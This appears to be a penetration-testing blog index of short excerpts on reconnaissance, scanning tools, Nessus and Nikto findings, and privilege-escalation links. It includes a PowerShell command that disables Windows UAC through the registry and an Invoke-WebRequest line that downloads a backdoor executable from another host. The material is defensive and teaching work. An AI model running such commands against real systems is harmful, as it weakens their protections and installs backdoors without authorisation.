Search in exploit-db searchsploit --color samba | grep 'linux\/' | grep -v '/dos/'searchsploit --color samba | grep 'linux\/' | grep -v '/dos/'
Read More »
After we gained a foothold on our target (exploitation) we want to upload and download files.
Read More »
Tools nmap OS Detection xprobe2
Read More »
Objective On UDP port 1434 is most likely the MS SQL Browser Service listening. You can query this service to retrieve version info and the TCP port where MS SQL Server Service is listening. Nmap nmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-infonmap -P0 -v -sU -sV -p 1434 <ip> --script ms-sql-info
Read More »
References Nmap UDP Protocol Scanner
Read More »
References Basic Linux Privilege Escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Windows Privilege Escalation http://www.fuzzysecurity.com/tutorials/16.html http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D https://github.com/ankh2054/windows-pentest?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3BzIszsQ%2FYRU%2BiWuuAK42a9w%3D%3D https://github.com/SecWiki/windows-kernel-exploits https://github.com/abatchy17/WindowsExploits
Read More »
References http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Read More »
Objective: Check your webserver SSL/TLS configuration via online tools.
Read More »
Often, during a penetration test on web applications, we come up against many error codes generated from applications or web servers. It’s possible to cause these errors to be displayed by using a particular requests, either specially crafted with tools or created manually. These codes are very useful to penetration testers during their activities, because […]
Read More »
Nikto Output DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
Read More »
Nikto Output The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Read More »
Nessus Output Synopsis : The remote device supports LLMNR. Description : The remote device answered to a Link-local Multicast Name Resolution (LLMNR) request. This protocol provides a name lookup service similar to NetBIOS or DNS. It is enabled by default on modern Windows versions. Reported Risk factor by Nessus: None In my option the severity should […]
Read More »
Description Code injection technique published by ensilo. AtomBombing: Brand New Code Injection for Windows
Read More »
Objective Verify the HTTP Response headers of your Web Site/Apps.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Netsparker will report this issue during your scanning phase.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Read More »
You probably gonna find this issue in your manual browsing and spidering phase of your assessment. But also Nessus will report this issue during your scanning phase.
Read More »
Links Metasploit Unleashed Free Online Security Training Metasploit Minute Metasploit Megaprimer Metasploit Cheat Sheet Metasploit on Github
Read More »
Nessus Output Description The version of Windows running on the remote host is affected by a vulnerability in the HTTP protocol stack (HTTP.sys) due to improperly parsing crafted HTTP requests. A remote attacker can exploit this to execute arbitrary code with System privileges.
Read More »
What is vFeed Cross Linked and Aggregated Local Vulnerability Database https://github.com/toolswatch/vFeed http://www.vfeed.io/
Read More »
There are many Pentest Methodologies that all share the same basic approach but their phases are named differently: Pre-engagement steps / Preparation / Scoping Intelligence Gathering / Information Gathering / Reconnaissance (Recon) / Open source intelligence (OSINT) / Footprinting Threat Modeling Scanning / Mapping / Enumeration / Vulnerability Analysis / Discovery Exploitation Post-Exploitation / Maintaining Access / […]
Read More »
Test Objectives Perform name lookups with a wordlist (dictionary attack) to identify services/hosts/websites in the target domain. Only applicable if Check for DNS zone transfer failed.
Read More »
Test Objective: Obtain valid server names and aliases for the IP addresses in the defined scope of the test. Only applicable if Check for DNS zone transfer failed.
Read More »
Test Objective Test if the authoritative nameservers are allowing zone transfers for the domains in scope.
Read More »
Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). (from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)
Read More »
Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0 – OTG-INFO-002)
Read More »
Test Objectives Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits to use during testing. (OWASP Testing Guide v4.0 – Fingerprint Web Server OTG-INFO-002)
Read More »
Test Objectives To understand what sensitive design and configuration information of the application/system/organization is exposed both directly (on the organization’s website) or indirectly (on a third party website). (from the OWASP Testing Guide v4.0 Conduct search engine discovery/reconnaissance for information leakage (OTG-INFO-001)
Read More »
Test Objective: Locate and record the target website(s).
Read More »
Test Objective: Check if the DNS servers are vulnerable to version queries. Analyze the reported version for vulnerabilities and available exploits.
Read More »
Objective: List the authoritative name server for the target domain(s).
Read More »
Objectives: Determine iprange of target(s) Determine nameservers of target(s) Determine ASnumber or target(s) Determine registrar of target (provider) Determine address information of Registrar Identify administrative contacts Collect telephone numbers Gather Emailaddresses
Read More »
Powershell: New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -ForceNew-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force Reboot required! Links: What pentesters should know about UAC Bypass UAC on Windows 8.1
Read More »
Bash: sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 Powershell: gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split(‘.’)) }gc .\ips.txt | sort {"{0:d3}.{1:d3}.{2:d3}.{3:d3}" -f @([int[]]$_.split(‘.’)) } Excel: Use the following formula to calculate a number which we can sort on (cell […]
Read More »
Objective Methods to download files via the Windows commandline.
Read More »
When we try to download a backdoor program Windows Defender will block the file. Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"Invoke-WebRequest -uri "http://192.168.1.17/sbd.exe" -OutFile ".\sbd.exe"
Read More »
A few code snippets to perform ping sweeps:
Read More »
